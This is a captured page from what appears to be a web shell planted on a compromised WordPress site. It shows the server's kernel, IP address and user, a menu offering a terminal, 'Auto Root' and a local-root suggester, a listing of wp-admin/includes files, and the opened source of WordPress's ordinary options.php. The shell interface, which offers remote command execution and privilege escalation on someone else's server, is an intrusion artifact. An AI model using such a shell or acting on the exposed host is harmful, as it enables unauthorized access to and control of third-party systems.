Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
klimaplan-landshut /
wp-admin /
includes /
Delete
Unzip
Name
Size
Permission
Date
Action
ajax-actions.php
142.22
KB
-rw-r--r--
2023-10-12 21:57
class-bulk-plugin-upgrader-skin.php
2.02
KB
-rw-r--r--
2021-03-01 14:04
class-bulk-theme-upgrader-skin.php
2.05
KB
-rw-r--r--
2021-03-01 14:04
class-bulk-upgrader-skin.php
5.18
KB
-rw-r--r--
2019-09-15 10:42
class-language-pack-upgrader.php
14.57
KB
-rw-r--r--
2021-03-01 14:04
class-theme-installer-skin.php
12.16
KB
-rw-r--r--
2021-03-01 14:04
class-wp-filesystem-base.php
22.69
KB
-rw-r--r--
2021-03-01 14:04
class-wp-internal-pointers.php
4.43
KB
-rw-r--r--
2020-01-29 00:45
class-wp-links-list-table.php
7.73
KB
-rw-r--r--
2021-03-01 14:04
class-wp-list-table-compat.php
1.46
KB
-rw-r--r--
2021-03-01 14:04
class-wp-list-table.php
40.55
KB
-rw-r--r--
2023-10-12 21:57
class-wp-media-list-table.php
23.2
KB
-rw-r--r--
2021-03-01 14:04
class-wp-plugins-list-table.php
41.87
KB
-rw-r--r--
2021-03-01 14:04
class-wp-posts-list-table.php
57.43
KB
-rw-r--r--
2021-03-01 14:04
class-wp-privacy-data-export-requests-list-table.php
5.41
KB
-rw-r--r--
2021-03-01 14:04
class-wp-screen.php
36.24
KB
-rw-r--r--
2021-03-01 14:04
class-wp-site-health.php
83.37
KB
-rw-r--r--
2021-03-01 14:04
class-wp-site-icon.php
6.01
KB
-rw-r--r--
2020-01-29 00:45
continents-cities.php
20.26
KB
-rw-r--r--
2018-07-18 11:21
credits.php
5.73
KB
-rw-r--r--
2021-03-01 14:04
edit-tag-messages.php
1.4
KB
-rw-r--r--
2019-07-01 12:52
options.php
4.03
KB
-rw-r--r--
2020-05-16 18:42
template.php
91.36
KB
-rw-r--r--
2021-03-01 14:04
widgets.php
10.52
KB
-rw-r--r--
2021-03-01 14:04
Save
Rename
<?php /** * WordPress Options Administration API. * * @package WordPress * @subpackage Administration * @since 4.4.0 */ /** * Output JavaScript to toggle display of additional settings if avatars are disabled. * * @since 4.2.0 */ function options_discussion_add_js() { ?> <script> (function($){ var parent = $( '#show_avatars' ), children = $( '.avatar-settings' ); parent.change(function(){ children.toggleClass( 'hide-if-js', ! this.checked ); }); })(jQuery); </script> <?php } /** * Display JavaScript on the page. * * @since 3.5.0 */ function options_general_add_js() { ?> <script type="text/javascript"> jQuery(document).ready(function($){ var $siteName = $( '#wp-admin-bar-site-name' ).children( 'a' ).first(), homeURL = ( <?php echo wp_json_encode( get_home_url() ); ?> || '' ).replace( /^(https?:\/\/)?(www\.)?/, '' ); $( '#blogname' ).on( 'input', function() { var title = $.trim( $( this ).val() ) || homeURL; // Truncate to 40 characters. if ( 40 < title.length ) { title = title.substring( 0, 40 ) + '\u2026'; } $siteName.text( title ); }); $( 'input[name="date_format"]' ).click( function() { if ( 'date_format_custom_radio' !== $(this).attr( 'id' ) ) $( 'input[name="date_format_custom"]' ).val( $( this ).val() ).closest( 'fieldset' ).find( '.example' ).text( $( this ).parent( 'label' ).children( '.format-i18n' ).text() ); }); $( 'input[name="date_format_custom"]' ).on( 'click input', function() { $( '#date_format_custom_radio' ).prop( 'checked', true ); }); $( 'input[name="time_format"]' ).click( function() { if ( 'time_format_custom_radio' !== $(this).attr( 'id' ) ) $( 'input[name="time_format_custom"]' ).val( $( this ).val() ).closest( 'fieldset' ).find( '.example' ).text( $( this ).parent( 'label' ).children( '.format-i18n' ).text() ); }); $( 'input[name="time_format_custom"]' ).on( 'click input', function() { $( '#time_format_custom_radio' ).prop( 'checked', true ); }); $( 'input[name="date_format_custom"], input[name="time_format_custom"]' ).on( 'input', function() { var format = $( this ), fieldset = format.closest( 'fieldset' ), example = fieldset.find( '.example' ), spinner = fieldset.find( '.spinner' ); // Debounce the event callback while users are typing. clearTimeout( $.data( this, 'timer' ) ); $( this ).data( 'timer', setTimeout( function() { // If custom date is not empty. if ( format.val() ) { spinner.addClass( 'is-active' ); $.post( ajaxurl, { action: 'date_format_custom' === format.attr( 'name' ) ? 'date_format' : 'time_format', date : format.val() }, function( d ) { spinner.removeClass( 'is-active' ); example.text( d ); } ); } }, 500 ) ); } ); var languageSelect = $( '#WPLANG' ); $( 'form' ).submit( function() { // Don't show a spinner for English and installed languages, // as there is nothing to download. if ( ! languageSelect.find( 'option:selected' ).data( 'installed' ) ) { $( '#submit', this ).after( '<span class="spinner language-install-spinner is-active" />' ); } }); }); </script> <?php } /** * Display JavaScript on the page. * * @since 3.5.0 */ function options_reading_add_js() { ?> <script type="text/javascript"> jQuery(document).ready(function($){ var section = $('#front-static-pages'), staticPage = section.find('input:radio[value="page"]'), selects = section.find('select'), check_disabled = function(){ selects.prop( 'disabled', ! staticPage.prop('checked') ); }; check_disabled(); section.find( 'input:radio' ).change( check_disabled ); }); </script> <?php } /** * Render the site charset setting. * * @since 3.5.0 */ function options_reading_blog_charset() { echo '<input name="blog_charset" type="text" id="blog_charset" value="' . esc_attr( get_option( 'blog_charset' ) ) . '" class="regular-text" />'; echo '<p class="description">' . __( 'The <a href="https://wordpress.org/support/article/glossary/#character-set">character encoding</a> of your site (UTF-8 is recommended)' ) . '</p>'; }